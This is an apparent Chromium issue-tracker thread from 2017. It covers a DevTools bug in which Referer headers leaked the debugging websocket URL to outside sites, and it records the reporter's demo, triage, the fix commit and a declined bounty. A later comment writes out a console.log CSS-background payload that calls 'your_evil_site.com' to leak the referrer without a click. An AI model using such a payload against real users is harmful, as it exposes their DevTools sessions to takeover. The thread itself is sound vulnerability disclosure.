dgozman, can you please take a look? I'm not sure what the "ws GET parameter" is so I'm not sure how severe this is. I'm tentatively assigning Low severity because of the user interaction involved. Nevertheless it seems like it would be a good idea to not include Referer headers from links clicked in DevTools.

I made live demo:
https://go666.ru/g98hw45gjeuvn8ewhrn9urewhgw984jw84g8rm9jf3uwhg4w8ugw4gtw

Video PoC

Deleted: chrome.mov 9.4 MB

chrome.mov 9.4 MB Download

Here is also code of PoC made on nodejs and express

Deleted: main.js 3.1 KB

main.js 3.1 KB View Download

P.S.
I think a good idea is not to include address of websocket in URL.
Maybe it should sent over POST request?

Hmm... Interesting. Although requiring a flag means no real exposure (per Chrome policy), this is worth fixing anyway.

Andrey, mind taking a look?

Better main.js code

Deleted: main.js 3.1 KB

main.js 3.1 KB View Download

Guys, can I remove web PoC from internet (go666.ru)?
Or it should stay online for now?

Guys, is it bug bounty applicable or something like that one?

;''''''''(

RE: #10: The Chrome Vulnerability Rewards team evaluates issues after the fix has landed. In general, issues of Low Severity are not awarded, but there are exceptions for especially interesting vulnerabilities. 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/a8ef19900d003ff7078fe4fcec8f63496b18f0dc

commit a8ef19900d003ff7078fe4fcec8f63496b18f0dc
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Aug 15 16:49:52 2017

[DevTools] Use no-referrer for DevTools links

Bug:  732751 
Change-Id: I77753120e2424203dedcc7bc0847fb67f87fe2b2
Reviewed-on: https://chromium-review.googlesource.com/615021
Reviewed-by: Andrey Kosyakov <caseq@chromium.org>
Commit-Queue: Dmitry Gozman <dgozman@chromium.org>
Cr-Commit-Position: refs/heads/master@{#494413}
[modify] https://crrev.com/a8ef19900d003ff7078fe4fcec8f63496b18f0dc/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/a8ef19900d003ff7078fe4fcec8f63496b18f0dc/third_party/WebKit/Source/devtools/front_end/inspector.html

Thanks for bringing attention to this. It slipped off our radar. I think it should be fixed now. Mind checking on your end?

Yo:)
It looks like fixed from my side.

Hello watashiwaher@.  I'm sorry to say the VRP panel decided not to award for this bug, citing the amount of victim interaction needed, and the unlikelihood of the scenario.

If you could describe how this could be used to attack users in a less niche scenario we'd be willing to take another look.  Thanks! 

(Note that it will be getting a CVE assigned when M61 goes stable)

There is one more scenario, where you don't need to click a link.
But you should probably open Network tab.

Okay.
I found elegant solution without interacting:

You just need to:

console.log('%c       ', 'font-size: 100px; background: url(https://your_evil_site.com/some_url) no-repeat;');

And image will be directly loaded from your tab (and referer will leak, I checked)

If you need some PoCs or somelike like that, ask me

Deleted: Screen Shot 2017-09-02 at 11.16.25.png 148 KB

	Screen Shot 2017-09-02 at 11.16.25.png 148 KB View Download

Actually console is open every time in chrome dev tools for most of users (bottom part actually), and request will be sent.

More dumb solution that I mentioned, is to send 404 error page with image inside it.

Deleted: Screen Shot 2017-09-02 at 11.24.15.png 80.0 KB

	Screen Shot 2017-09-02 at 11.24.15.png 80.0 KB View Download

Is it still bad bug ? :O

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot